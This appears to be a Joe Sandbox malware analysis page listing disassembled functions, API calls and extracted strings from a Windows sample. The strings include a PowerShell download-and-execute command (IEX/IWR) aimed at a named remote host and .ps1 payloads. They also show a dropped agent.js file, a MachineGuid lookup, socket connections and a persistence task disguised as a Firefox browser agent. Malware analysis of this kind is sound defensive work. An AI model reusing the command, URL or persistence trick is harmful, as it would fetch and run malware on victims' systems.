Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://kionaonline.com/modules/bonslick$open$sd2.ps1$sd4.ps1
API String ID: 4132772799-999334212
Opcode ID: 955c536a676e4b0b17fc0d7c25df1fc8cbc51370f4dade14e3004e6e2826ecb8
Instruction ID: edb1bcc9b96597d6fcd355a80a292ee3c538ba671b623b1e0874d06183661ece
Opcode Fuzzy Hash: 955c536a676e4b0b17fc0d7c25df1fc8cbc51370f4dade14e3004e6e2826ecb8
Instruction Fuzzy Hash: 72212B7194421CBBDB25DA64DC49FEA776CEB04714F0001AEE728E20C0E7B096C58F90

Function 011F56E0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 167memorypipeprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 011F5713
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5771
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5784
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5789
WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F57A0
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F57B7
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F57F4
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F581F
HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5822
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F582D
HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5830
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5887
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F58A3
CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F58A8

Strings

D, xrefs: 011F5736

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
String ID: D
API String ID: 2337985897-2746444292
Opcode ID: db0c4c38397000ff08e1482f8d3c820c56d9635ae90c6dc6502fbc4c80f68c28
Instruction ID: e6830026cd8ef92111af84e2bf17b48c67478ec4b7e619816b3cf05b6c8f1000
Opcode Fuzzy Hash: db0c4c38397000ff08e1482f8d3c820c56d9635ae90c6dc6502fbc4c80f68c28
Instruction Fuzzy Hash: B8519171A00219AFEB248FA6DC44FAEBFBAFF44704F14446DEA25E7280D77498448B64

Function 011F72A0 Relevance: 22.6, APIs: 15, Instructions: 131memorynetworkthreadCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 011F72B3
htons.WS2_32(?), ref: 011F72BE
socket.WS2_32(00000002,00000001,00000006), ref: 011F72D6
connect.WS2_32(00000000,?,00000010), ref: 011F72F4
recv.WS2_32(00000000,?,00000002,00000000), ref: 011F730C
GetProcessHeap.KERNEL32(00000008,00000024), ref: 011F732D
HeapAlloc.KERNEL32(00000000), ref: 011F7330
CreateThread.KERNEL32(00000000,00000000,Function_000062B0,00000000,00000000,00000000), ref: 011F73AB
CloseHandle.KERNEL32(00000000), ref: 011F73B6
recv.WS2_32(00000000,?,00000002,00000000), ref: 011F73CE
closesocket.WS2_32(00000000), ref: 011F73DD
GetProcessHeap.KERNEL32(00000000,?), ref: 011F73E6
HeapFree.KERNEL32(00000000), ref: 011F73E9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F7403
HeapFree.KERNEL32(00000000), ref: 011F7406

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
String ID:
API String ID: 2784442062-0
Opcode ID: f367a6ed4825b025a0479f334163eacdebab36d51ccc38c9673005cba751c72b
Instruction ID: b2f0330c127fe1fd7fae859619d1bd7179df1afeb4085686c0ec7a6d6d757163
Opcode Fuzzy Hash: f367a6ed4825b025a0479f334163eacdebab36d51ccc38c9673005cba751c72b
Instruction Fuzzy Hash: DE41C134A08345BAE7388B79DC4AB6A7F7CEF05710F14416CFB12DA1C2D770948187A8

Function 00791E90 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

task.LIBCPMTD ref: 00791F50
task.LIBCPMTD ref: 00791F5F
task.LIBCPMTD ref: 00791F8F
task.LIBCPMTD ref: 00791F9B
task.LIBCPMTD ref: 00791FA7
task.LIBCPMTD ref: 00791FB3
task.LIBCPMTD ref: 00791FBF
task.LIBCPMTD ref: 00791FCE

Strings

fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv, xrefs: 00791EF6
gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb, xrefs: 00791EDD
hcndlsldtwhpkrlbisuiflvfeofcd, xrefs: 00791EC5, 00791F07, 00791F24
`, xrefs: 00791F6C

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traits
String ID: `$fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv$gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb$hcndlsldtwhpkrlbisuiflvfeofcd
API String ID: 1455298312-2158094500
Opcode ID: a10f1240f083a7524a03a2d4b21f506deda8f8a1bf957a54bda4f695598308cc
Instruction ID: cbe57274941b8d72fa8f9c69a3ca2f5d5ad7965d39eecaad4c106b2c9401f698
Opcode Fuzzy Hash: a10f1240f083a7524a03a2d4b21f506deda8f8a1bf957a54bda4f695598308cc
Instruction Fuzzy Hash: C441187090538CDADF04DBA8E969BEEFBB1AF11704F504199E0057B292EB791B18CB91

Function 011F7170 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 011F7191
lstrlenW.KERNEL32(?), ref: 011F719A
ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 011F71B5
GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 011F71C3
GetLastError.KERNEL32 ref: 011F71CD
ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 011F71E4
wnsprintfW.SHLWAPI ref: 011F71FE
SetFileAttributesW.KERNEL32(?,00000006), ref: 011F721E

Strings

%ProgramFiles%, xrefs: 011F71B0
%ProgramW6432%, xrefs: 011F718C
"%s", xrefs: 011F71ED
%ProgramData%\agent.js, xrefs: 011F71DF

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$AttributesDirectoryErrorFileLastSystemWow64lstrlenwnsprintf
String ID: "%s"$%ProgramData%\agent.js$%ProgramFiles%$%ProgramW6432%
API String ID: 457462216-4115850629
Opcode ID: b313f2f2baf35f4ca5a09fef26fa66436b86cd7fa325b4fa2f445fc3f4673011
Instruction ID: ef2c1d408648ab12e9ffc6c42cf0a01a5f4c83a57b85d09393b4c9a53959f75f
Opcode Fuzzy Hash: b313f2f2baf35f4ca5a09fef26fa66436b86cd7fa325b4fa2f445fc3f4673011
Instruction Fuzzy Hash: A31169B1A4431CABD724D690EC49FD9777C9B05704F4400AAEB25D2054E7B156C88F95

Function 0079A0C4 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0079A108

Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C4C
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C5E
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C70
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C82
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C94
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CA6
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CB8
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CCA
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CDC
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CEE
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799D00
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799D12
Part of subcall function 00799C2F: _free.LIBCMT ref: 00799D24

_free.LIBCMT ref: 0079A0FD

Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA

_free.LIBCMT ref: 0079A11F
_free.LIBCMT ref: 0079A134
_free.LIBCMT ref: 0079A13F
_free.LIBCMT ref: 0079A161
_free.LIBCMT ref: 0079A174
_free.LIBCMT ref: 0079A182
_free.LIBCMT ref: 0079A18D
_free.LIBCMT ref: 0079A1C5
_free.LIBCMT ref: 0079A1CC
_free.LIBCMT ref: 0079A1E9
_free.LIBCMT ref: 0079A201

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a29d6b986b16dbe0b65b1673f7a4ddef5ec955171482823d519d90036ee72334
Instruction ID: 2046e2f20d29afc9ef52efa27c96fbc1338853e7eb42055fda084a23dda594bd
Opcode Fuzzy Hash: a29d6b986b16dbe0b65b1673f7a4ddef5ec955171482823d519d90036ee72334
Instruction Fuzzy Hash: BD313D31649209EFEF35AA38F849B5AB7FAAF40310F148429E459E6151EF38ED81C761

Function 00792540 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

operator!=.LIBCPMTD ref: 00792606
task.LIBCPMTD ref: 00792614
task.LIBCPMTD ref: 00792623

Strings

nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng, xrefs: 00792582, 007925D1, 007925EE
(, xrefs: 007925B5
W, xrefs: 0079269A
, xrefs: 0079267A
0, xrefs: 00792630
8, xrefs: 00792655

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: $($0$8$W$nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng
API String ID: 2802545854-1628632686
Opcode ID: e99e96a17721dd65316f7c0413aa5410df1f2444bc7449787553a701ad68a58f
Instruction ID: bb1ea8bc06ebe93f2eb3314b2114c4a5b18e22c2c6e27017820e2cae4a6a7e9f
Opcode Fuzzy Hash: e99e96a17721dd65316f7c0413aa5410df1f2444bc7449787553a701ad68a58f
Instruction Fuzzy Hash: 1C518D70D0420CEFDF04EFA8E954BADBBB1FF45304F108259E405ABA82EB795A45CB40

Function 011F6990 Relevance: 15.1, APIs: 12, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(011FA080), ref: 011F69A1
StrCmpNIA.SHLWAPI(?,?,00000000), ref: 011F69DA
LeaveCriticalSection.KERNEL32(011FA080,00000000), ref: 011F69F6
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A50
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A57
LeaveCriticalSection.KERNEL32(011FA080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A6D
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A87
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A8E
LeaveCriticalSection.KERNEL32(011FA080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A9F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 011F6AAB
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6AB2
LeaveCriticalSection.KERNEL32(011FA080), ref: 011F6AC3

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
String ID:
API String ID: 2132424838-0
Opcode ID: c55c139c6b48d05121a6535ff009350036432681b6bf3e5eec3920021f7275a6
Instruction ID: 535ac5a236e7b434a3c23abcdcee5c783bd6eba3595909e2fdfb4dd7cb0dcb68
Opcode Fuzzy Hash: c55c139c6b48d05121a6535ff009350036432681b6bf3e5eec3920021f7275a6
Instruction Fuzzy Hash: 6B315CB16042119FE72D9F69F84CB663B69FB88311F18413DE66AC7245DB388085C754

Function 00798212 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00798228

Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA

_free.LIBCMT ref: 00798234
_free.LIBCMT ref: 0079823F
_free.LIBCMT ref: 0079824A
_free.LIBCMT ref: 00798255
_free.LIBCMT ref: 00798260
_free.LIBCMT ref: 0079826B
_free.LIBCMT ref: 00798276
_free.LIBCMT ref: 00798281
_free.LIBCMT ref: 0079828F

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: de4d548eba0028b70636c4fd757b545cd9f520b08e21853f46fc9691fb30b708
Instruction ID: b12616158362e59d9eb675210cfc06ae6362f9da2838d9a432894a42d7a1a2a5
Opcode Fuzzy Hash: de4d548eba0028b70636c4fd757b545cd9f520b08e21853f46fc9691fb30b708
Instruction Fuzzy Hash: 57219A76A14108EFCF45EF94E885DDE7BB9BF08340F004166F519AB221DB35DA95CB90

Function 007953DB Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 007954FA
___TypeMatch.LIBVCRUNTIME ref: 00795608
_UnwindNestedFrames.LIBCMT ref: 0079575A
CallUnexpected.LIBVCRUNTIME ref: 00795775

Strings

csm, xrefs: 00795485
csm, xrefs: 00795531
csm, xrefs: 00795418
G&, xrefs: 0079577A

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$G&
API String ID: 2751267872-2003760868
Opcode ID: afd7c5a7727a1a9e1b6c15af85d4bb289a3da4024fc41f7d74050cfde5eb6c69
Instruction ID: 1199225f03e53d78229b0b5f881270dd5a76117e5c95b63f6c10f385acd2bfe8
Opcode Fuzzy Hash: afd7c5a7727a1a9e1b6c15af85d4bb289a3da4024fc41f7d74050cfde5eb6c69
Instruction Fuzzy Hash: 63B19E71800A29EFCF16DFA4E8859AEBBB5FF14310F15415AE8016B212D739DA61CF91

Function 011F7010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 130registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 011F7047
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 011F7063
GetProcessHeap.KERNEL32(00000008,?), ref: 011F7072
HeapAlloc.KERNEL32(00000000), ref: 011F7079
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 011F7096
RegCloseKey.ADVAPI32(80000002), ref: 011F70A8

Strings

MachineGuid, xrefs: 011F705B, 011F708E
SOFTWARE\Microsoft\Cryptography, xrefs: 011F703D

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocCloseOpenProcess
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2639912721-1211650757
Opcode ID: 5d268407b25b70e6c47d493dcae6a662b0a01af10eeec90b82a2ebad1d5cddbd
Instruction ID: 516994422dbc28bf24e611383cc51cf6f2ab9669c33f19e23881693d013ad5cc
Opcode Fuzzy Hash: 5d268407b25b70e6c47d493dcae6a662b0a01af10eeec90b82a2ebad1d5cddbd
Instruction Fuzzy Hash: 2D41EE35E04215ABEB398BACC884BBBBBB9EF09300F14446CDB45E7291D7718985C790

Function 00791D30 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

operator!=.LIBCPMTD ref: 00791DB9
task.LIBCPMTD ref: 00791DC7
task.LIBCPMTD ref: 00791DD6

Strings

jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug, xrefs: 00791D5B, 00791D84, 00791DA1
1, xrefs: 00791E08
H, xrefs: 00791E28
P, xrefs: 00791D76

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: 1$H$P$jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug
API String ID: 2802545854-3608006743
Opcode ID: cf2100c629557a7f3f4037ae4aa4b4ac6a670f5ae7e27e048b9e19090a1606b2
Instruction ID: 898158b0e5aae283accf5892b148e50089f164d0d96c29fd352a6935a787d9a1
Opcode Fuzzy Hash: cf2100c629557a7f3f4037ae4aa4b4ac6a670f5ae7e27e048b9e19090a1606b2
Instruction Fuzzy Hash: 30414770D00249EFDF14DFA8E999BEDBBB1FB00705F604129E812A7284DB785A59CB50

Function 011F6AD0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95memorycomCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 011F6AE7
CoCreateInstance.OLE32(011F1020,00000000,00000001,011F1000,?), ref: 011F6B04
SysAllocString.OLEAUT32(\Mozilla), ref: 011F6B44
SysFreeString.OLEAUT32(?), ref: 011F6B7B
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 011F6B88
SysFreeString.OLEAUT32(00000000), ref: 011F6B9F

Strings

Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 011F6B83
\Mozilla, xrefs: 011F6B3F

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: String$AllocFree$CreateInitInstanceVariant
String ID: Firefox Default Browser Agent 458046B0AF4A39CB$\Mozilla
API String ID: 478541636-252850850
Opcode ID: 7dc88f46bdb9d67f096041b3ea03af12d65ebb437feb4f0cd15bb03733dd081f
Instruction ID: 11a58b347bcd76c4f72741a341db621162f57be3e7389b2093d7696c619b7c63
Opcode Fuzzy Hash: 7dc88f46bdb9d67f096041b3ea03af12d65ebb437feb4f0cd15bb03733dd081f
Instruction Fuzzy Hash: 3831C170F04248BFD7149B69C889BAEBBB8EF49304F0441ACFA05E7241D731AD84CBA5

Function 007928A0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94COMMON

Download Yara Rule

Strings

8, xrefs: 00792993
9, xrefs: 00792913
&, xrefs: 00792973
uqip, xrefs: 00792902
jgjqrkqomrozhbdhmdxtwulfach, xrefs: 007928D9

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: char_traits
String ID: &$8$9$jgjqrkqomrozhbdhmdxtwulfach$uqip
API String ID: 1158913984-1523665428
Opcode ID: 39ce8d3ed4882a8cad2554797095eff674f53136e6a0e80362fd615753399738
Instruction ID: 6e1a9f6b1c1fc3232dba9cf732a1c270670f46a206c03345fc1627006ff7049f
Opcode Fuzzy Hash: 39ce8d3ed4882a8cad2554797095eff674f53136e6a0e80362fd615753399738
Instruction Fuzzy Hash: 7A415970D04248DADF14EFE8E9497ADBBB1FB45324F148219D0127B28ADB7D6A46CB41

Function 007926F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

operator!=.LIBCPMTD ref: 007927B9
task.LIBCPMTD ref: 007927CA
task.LIBCPMTD ref: 007927D9

Strings

jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh, xrefs: 0079276C
wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji, xrefs: 00792746, 00792781, 0079279E

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traitsoperator!=
